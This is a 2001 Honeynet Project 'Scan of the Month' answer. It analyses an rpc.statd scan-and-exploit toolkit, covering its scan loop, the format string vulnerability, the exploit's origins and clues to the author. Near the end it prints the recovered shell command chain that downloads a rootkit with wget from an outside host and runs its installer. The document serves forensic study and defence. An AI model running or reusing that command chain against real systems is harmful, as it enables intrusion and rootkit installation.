From cata@net4u.ro Fri Mar 23 10:14:51 2001 Date: Thu, 22 Mar 2001 13:48:29 +0200 (EET) From: Catalin Ionescu To: project@honeynet.org Subject: Scan of the month - March Scan #13 The scan for March, 2001. This month's challenge is unique as you are called upon to analyze an extremelly powerful but commonly used tool used by the blackhat community. ___________________________________________________________ The Challenge: QUESTION 1. What is the blackhat attempting to do with his command line syntax? As we will see later, it runs several times an automated probing tool, scanning various portions of the IP address space, in an attempt to find and gain administrative access to vulnerable servers. QUESTION 2. What does the tool accomplish? This is an automated vulnerability probing tool. It scans entire nets looking for those running rpc.statd, and when such hosts are found, it attempts to exploit a known vulnerability (string formatting buffer overflow) in the daemon. This vulnerability is present in all versions of rpc.statd starting with nfs-utils-0.1.6 and up to knfsd-1.4.7-7. The vulnerability was presented to BUGTRAQ readers on 1 August 2000 along with an working exploit by Doing . QUESTION 3. How does the tool work? luckgo is a shell script that launches luckscan-a. This is expecting four parameters on the command line: luckscan-a A port B C luckgo sets port to 111, and passes A, B and C from the command line, if at least A is entered. A, B, C are parts of decimal-dotted IP address notation A.B.C.D. Port is the port that is checked if it is open. A and port are mandatory options. If not present, B and C are initialised with 0. D is always initialised to 0. Then, a loop is entered, where for each incrementation of D, the IP address resulting is checked if port is open. If yes, luckstatdx is automatically executed. The parameters used are as follows: luckstatdx -d host_type host_type is 0, so the blackhat is targeting RedHat 6.2. The target is the IP address found above. Returning to the loop, D is incremented by one unit at each loop until it reaches 255. Then, it is reset to 0, and C is incremented one unit. The loop continues in the same manner with B and A, indefinitely. A good explanation of the technique used in this vulnerability can be found along with an working exploit in the file published by ron1n . The original file can be retrieved from many places, one of them being http://neworder.box.sk. To summarize from ron1n's explanations: "rpc.statd is an ONC RPC server that implements the Network Status Monitor RPC protocol to provide reboot notification. It is used by the NFS file locking service (rpc.lockd) when it performs lock recovery. Due to a format string vulnerability in a call to syslog() within its logging module, rpc.statd can be exploited remotely by script kids bent on breaking into your Redhat Linux box and defacing your website with crackpot political musings. This is not a traditional buffer overflow vulnerability. The data are kept within the bounds of the buffer by means of a call to vsnprintf(). The saved return address can be overwritten indirectly without a contiguous payload. syslog() is given, for the most part, a user-supplied format string with no process-supplied arguments." QUESTION 4. Is this tool a worm, or would you classify it as something else? An Internet worm, based on general accepted definitions, is a program capable of multiplying itself, without requiring human interaction. This tool is an automated probing and exploiting tool. However, as at some point, in the luckstatdx, an archive is retrieved from www.becys.org, extracted and a program found inside is run. As the content of that archive is unknown, if it contains a copy of LUCKROOT.TAR, it may be considered a worm. However, patterns in the keystrokes recorded by the honeypot (several attempts to expand the .tar archive, a mistake when running luckgo) made me believe it is a human who is logged on the honeypot, not an electronic program. QUESTION 5. Is this tool original, or is it simply based on previous tools? If based on previous tools, which ones and what is modified? The luckstatdx.c exploit is copied from the one published on 24 July 2000 by ron1n . I presume that luckscan-a.c is also based on previous tools, but was unable to find an approximate match. Additional evidence supporting this theory is that in the original .TAR archive, luckscan-a.c has a timestamp with more than two month earlier than the rest of the files. In luckstatdx.c, ron1n's comments were removed from the begining, and his name replaced with becys in the usage() function. In runshell() function, the commands to be executed on the remote server were changed, adding an automated trojan download and install. Also, several other messages to be displayed during the program launch were changed. BONUS QUESTION: What information can you obtain about who is using or created the tool? First we check to see if the precompiled binaries are obtained by compiling the c sources. We do a strings luckstatdx | less and we notice that in the precompiled binary, in the runshell() function, the commands to be executed on the remote server are changed. In the binary we found the following commands: cd /; uname -a; id; wget neamtu.lsa.ro/rg.tgz; tar zxvf rk.tgz; cd 2; ./install.sh; cd /; rm -rf rk.tgz; rm -rf 2 The URL for the trojan is different, pointing out that either: neamtu.lsa.ro was broken earlier, or it was created on that machine. The machine was located in Romania, but is down. Also, in luckstatdx.c, we found a commentary added by Becys that appeared to be written in Romanian. Thus, we believe that both the blackhat who created this tool and the one who is using it (though we have no evidence as being more than one person involved) are from Romania. Examination of users and other informations presenter in .TAR headers did not reveal further informations. Following the path to the URL from which the trojan kit is downloaded took nowhere, as the domain becys.org is suspended by the provider. We presume it was bought with a fake credit card by the black hat from Web Site Source, a domain hosting provider. Catalin Ionescu